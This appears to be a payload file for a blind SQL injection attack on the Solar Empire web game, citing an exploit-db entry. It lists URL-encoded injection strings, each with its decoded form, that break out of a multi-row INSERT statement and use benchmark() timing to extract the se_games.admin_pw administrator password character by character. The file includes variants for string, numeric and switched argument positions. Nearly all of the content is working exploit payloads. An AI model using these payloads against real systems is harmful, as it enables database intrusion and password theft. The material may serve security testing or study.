# solar empire attack
# http://www.exploit-db.com/exploits/4078/

# these use the multiple insert syntax
# INSERT INTO FOO VALUES (1, 'foo'), (2, 'bar) ....
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
# $sql = "INSERT INTO FOO VALUES ('$DIRTY', 2)"

# Base attack - blind SQL injection using ASCII-based character extraction
# Decoded: F****'),(1,2,3,4,5,(SELECT IF ((ASCII(SUBSTRING(se_games.admin_pw,1,1))='1') & 1, benchmark(20000,CHAR(0)),0) FROM se_games))/*
F%2A%2A%2A%2A%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A

# numeric version - same attack but with numeric value instead of string
# Decoded: 999),(1,2,3,4,5,(SELECT IF ((ASCII(SUBSTRING(se_games.admin_pw,1,1))='1') & 1, benchmark(20000,CHAR(0)), 0) FROM se_games))/*
999%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A

# arg switch - testing different argument positions in the INSERT statement
# Decoded: F****, 2),(1,2,3,4,5,(SELECT IF ((ASCII(SUBSTRING(se_games.admin_pw,1,1))='1') & 1, benchmark(20000,CHAR(0)), 0) FROM se_games))/*
F%2A%2A%2A%2A%27%2C+2%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A

# arg switch + numeric - combining numeric and string arguments
# Decoded: 999, 'CRAP'),(1,2,3,4,5,(SELECT IF ((ASCII(SUBSTRING(se_games.admin_pw,1,1))='1') & 1, benchmark(20000,CHAR(0)), 0) FROM se_games))/*
999%2C+%27CRAP%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
# Decoded: 999, 1),(1,2,3,4,5,(SELECT IF ((ASCII(SUBSTRING(se_games.admin_pw,1,1))='1') & 1, benchmark(20000,CHAR(0)),0) FROM se_games))/*
999%2C+1%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A
